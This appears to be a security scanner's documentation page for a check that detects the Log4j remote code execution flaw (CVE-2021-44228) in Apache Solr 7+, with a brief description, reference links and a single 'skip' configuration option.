Access Control: Apache Solr 7+ - Remote Code Execution (Apache Log4j)¶
Identifier:
apache_solr_log4j_rce
Scanner(s) Support¶
| GraphQL Scanner | REST Scanner | WebApp Scanner | ASM Scanner |
|---|---|---|---|
Description¶
Apache Solr 7+ is affected by Log4j remote code execution vulnerabilities where JNDI features do not protect against attacker-controlled LDAP and other JNDI endpoints, allowing remote code execution.
How we test: We test for Log4j remote code execution vulnerabilities in Apache Solr by injecting JNDI lookup payloads into log messages and parameters, then analyzing responses to detect if remote code execution is possible.
Reference:
- https://solr.apache.org/security.html#apache-solr-affected-by-apache-log4j-cve-2021-44228
- https://twitter.com/sirifu4k1/status/1470011568834424837
- https://github.com/apache/solr/pull/454
- https://logging.apache.org/log4j/2.x/security.html
- https://nvd.nist.gov/vuln/detail/CVE-2021-44228
- https://github.com/vulhub/vulhub/tree/master/log4j/CVE-2021-44228
Configuration¶
Example¶
Example configuration:
Reference¶
skip¶
Type : boolean
Skip the test if true.